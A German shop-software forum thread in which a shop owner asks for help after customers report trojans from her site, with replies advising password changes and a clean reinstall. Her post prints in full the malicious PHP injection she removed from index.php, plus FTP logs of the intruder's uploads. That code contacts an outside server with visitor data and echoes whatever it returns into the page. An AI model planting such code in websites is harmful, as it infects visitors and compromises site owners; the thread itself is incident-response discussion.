Probleme mit Malware . . .

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
9
Hallo,

habe von einer Kundin gestern morgen folgende Mitteilung erhalten:

> Vielen Dank für die Zusendung des Kleids und der anderen Teile.
> mir ist aufgefallen, dass ich nach Besuch Ihrer Website sogenannte
> Malware
> (Trojaner) auf meinem Computer hatte. Nach Bereinigung durch meinen
> IT-Fachmann, hatte ich sofort wieder die gleichen Trojaner auf meinem
> Computer, als ich auf Ihre Website ging. Könnten Sie Ihre Seite bitte
> überprüfen lassen, da anscheinend jemand dort bösartige Software
> versteckt hat.
> Gibt es eine Möglichkeit, seitens HostEurope meine Daten zu scannen?
> Vielen Dank für eine schnelle Rückmeldung und viele Grüße

Auf Anfrage teilte mir Hosteurope dann folgendes mit:

In der index.php findet sich ab Zeile 178/179 etwas seltsamer Code. Zumindest gibt es base64-codierten Quelltext welcher hier vermutlcih nicht hingehört. Innerhalb dieses Codes wird ab

http://botstatisticupdate.com/stat/stat.php

zugegriffen (Zeile 190). Wenn Ihnen diese Domain nichts sagt, ist das vermutlich der Schadcode.

Wir haben Ihnen die FTP-Logfileauszüge der letzten 7 Tage in das Root Verzeichnis Ihres Webpacks gelegt. Sie können diese Daten per FTP abrufen.

Wenn dieser Link da nicht hingehört - wo kommt der her und kann ich den einfach in der index.php löschen, ohne dass er wieder auftaucht?
 

MBesancon

Administrator
Mitarbeiter
1. Oktober 2010
2.080
215
Erkelenz
AW: Probleme mit Malware . . .

Du solltest deine FTP-Passwörter ändern. Möglicherweise kam es über diesen Weg.

Auf jeden Fall gehört dieser Code NICHT in die Datei und sollte sofort entfernt werden!
 

Freaky

Sehr aktives Mitglied
7. Mai 2009
1.331
104
AW: Probleme mit Malware . . .

Was sagt denn der Shopdateien-Check? Der müsste doch da was festgestellt haben oder?
 

KathiLe

Sehr aktives Mitglied
31. August 2009
2.899
9
AW: Probleme mit Malware . . .

Nee, der hat nichts außergewöhnliches entdeckt.
Ich habe jetzt folgenden Code aus der index.php entfernt:

<?phpif (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHN0YXRpc3RpY3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

Und die log-Datei von Hosteurope zeigte mir folgendes an:

Auszug der Transferlogs zum FTP-Account 1160504:
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:03 +0200] "-"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:05 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7480 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:06 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [26/Mar/2012:16:07:07 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:24 +0200] "-"
RETR ftp1160504-203484 - 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:25 +0200] "-"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:26 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:27 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/cap/index.php"
RETR ftp1160504-203484 7542 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:28 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"
STOR ftp1160504-203484 7546 184.173.19.183-static.reverse.softlayer.com [29/Mar/2012:17:42:29 +0200] "/is/htdocs/wp1160504_57MJMX2I2G/www/jtb/index.php"

Betrifft also unsere beiden Shops - wer bitte ist "softlayer"?
 

ag-websolutions.de

Sehr aktives Mitglied
29. Dezember 2009
14.548
232
AW: Probleme mit Malware . . .

ich würde es nicht bei einer Bereinigung der index.php belassen....

sichere die config.ini.php und das template-verzeichnis und setze den shop neu auf ...

wenn nämlich in anderen dateien noch schadcode steckt ... ist dein shop ratz fat wieder infiziert

denke auch daran sämtliche Kennwörter zu ändern (shop-datenbank, ftp-zugang, shop-admin)
 
Ähnliche Themen
Titel Forum Antworten Datum
Neu Probleme mit Pixel-Code eines Drittanbieters in Templatedatei Betrieb / Pflege von JTL-Shop 1
Probleme mit dem Einstellen von Artikeln auf Amazon über JTL Wawi mit dem Lister 2.0 Amazon-Lister - Fehler und Bugs 6
Neu Encoding-Probleme mit dem Proto-Template Templates für JTL-Shop 7
Neu PayPal Checkout Plugin (iPhone), Probleme mit PayPal-App Plugins für JTL-Shop 0
Neu Probleme beim Abgleich mit dem WooCommerce-Connector WooCommerce-Connector 0
Wir haben Probleme beim Abgleich mit Amazon Amazon-Anbindung - Fehler und Bugs 42
Neu Probleme mit der Email über jtl hosting (plesk) User helfen Usern 2
Neu Teilweise Probleme mit Kindartikel anlegen User helfen Usern - Fragen zu JTL-Wawi 5
Neu Probleme mit Etikettendrucker User helfen Usern - Fragen zu JTL-Wawi 0
Nach Update auf 1.10.13.2 Probleme mit der POS Kasse JTL-Wawi 1.10 7
Probleme mit wawi, in der leiste wird kein onlineshop angezeigt JTL-Wawi 1.10 8
Neu JTL Shop 5 Probleme mit Anlegen eines Kundenaccounts Allgemeine Fragen zu JTL-Shop 4
Neu Probleme nach Shop Update auf V5.6 Onlineshop-Anbindung 3
Neu Weiterleitungen Probleme Allgemeine Fragen zu JTL-Shop 2
Neu Aktuell hat PayPal Probleme BUG Korrektur Buchungen Allgemeine Fragen zu JTL-Shop 1
Neu Probleme bei Mediafinanz / CRIF Bonitätsprüfung Business Jungle 1
Neu IDeal macht irgendwie Probleme, bei euch auch ? Allgemeine Fragen zu JTL-Shop 0
Neu FBA-Artikel lässt sich nicht mit Stücklistenartikel verknüpfen – Workaround? Arbeitsabläufe in JTL-Wawi 0
Neu Kartenzahlung mit Zettle / Wo finde ich einen Transaktionscode in der Datenbank? Allgemeine Fragen zu JTL-POS 0
Neu Wer hat 2025 mit Xentral Erfahrungen gesammelt? Wechsel von JTL‑Wawi in Sicht Smalltalk 2
Funktion mit welchem Konnektor? JTL-Wawi 1.11 0
Kann ich mit dieser SQL Version die neue WaWi 1.11.1 installieren? JTL-Wawi 1.11 2
Neu Übergabe Versandlaber an Fulfiller möglich über FFN standallone aber nicht über FFN mit angebundeener JTL-WAWI Arbeitsabläufe in JTL-Wawi 0
Ticket erstellen bei einer Fehlermeldung mit JTL-Start ??? JTL-Wawi 1.9 1
Umlaute in Städtenamen werden mit � dargestellt JTL-Wawi 1.11 2
Neu Problem mit Drucker User helfen Usern - Fragen zu JTL-Wawi 0
Artikelstatistik funktioniert nicht mehr mit 1.11 JTL-Wawi 1.11 2
Studio-Webcast E-Com Insights mit JTL: Black Friday Edition am 30.10.25 Messen, Stammtische und interessante Events 0
Neu JTL Shop Versand Preisstaffel mit negativen Werten?? Allgemeine Fragen zu JTL-Shop 0
Neu Zeiterfassung Tablett Terminal - mit Hinweis: Arbeitszeit heute nicht erreicht User helfen Usern 3
Neu Artikelsuche mit % Platzhalter funktioniert nicht mehr (wie früher) JTL-Wawi - Fehler und Bugs 6
Problem mit API Anbindung JTL-Wawi 1.11 2
Neu Leere Suche – Ergebnis definieren mit Doofinder User helfen Usern - Fragen zu JTL-Wawi 0
Neu Artikel mit gleichem Namen werden bei Shopify zu einem Artikel Shopify-Connector 2
Kein E-Mail-Versand mit Anhängen möglich JTL-Wawi 1.11 21
Neu Falscher E-Mail-Absender beim Arbeiten mit mehrere Firmen JTL-Wawi - Fehler und Bugs 0
Neu Abgleich bricht mit Fehler 503 ab Shopware-Connector 3
Neu Neues PLugin: DITH Lieferantenbestand – realistische Lieferzeiten mit Lieferanten- + Eigenbestand Plugins für JTL-Shop 0
Rechnungen mit Differenzbesteuerung JTL-Wawi 1.9 7
In Diskussion Etikett mit Warnung bei Versand drucken JTL-Workflows - Ideen, Lob und Kritik 9
1.11 mit 2 Mandanten - Dashboard bei Advanced Wawi zerschossen - JTL Start funktioniert JTL-Wawi 1.11 1
Was ist mit der Wawi 1.11.0? JTL-Wawi 1.11 20
Neu PC-Umzug mit Datenbanksicherung von JTL-Wawi 1.5.48 User helfen Usern - Fragen zu JTL-Wawi 5
Neu JTL Shop Update von 5.3.3 auf 5.6 mit der Community Free Edition - WaWi funktion weiter gegeben? User helfen Usern - Fragen zu JTL-Wawi 1
Neu JTL-Shop TECHNIK (SalePix) – Problem mit Render Blocking Requests User helfen Usern - Fragen zu JTL-Wawi 2
Neu Ladenpreis auf Etikett mit Bedingung verknüpfen User helfen Usern - Fragen zu JTL-Wawi 1
Neu Nach Update auf 1.10.14.1 - Zahlungsart wird beim Auftrag erstellen nicht mit übernommen + Sepa Eingänge JTL-Wawi - Fehler und Bugs 0
Neu Greyhound Erfahrungen mit Marktplätzen User helfen Usern - Fragen zu JTL-Wawi 6
Produkt-API v4 Support bei OTTO läuft aus (10.12.2025) – Zukunft mit JTL Wawi unklar Otto.de - Anbindung (SCX) 25
Neu Temu-Anbindung mit JTL / Fehlermeldung beim Hochladen Onlineshop-Anbindung 1

Ähnliche Themen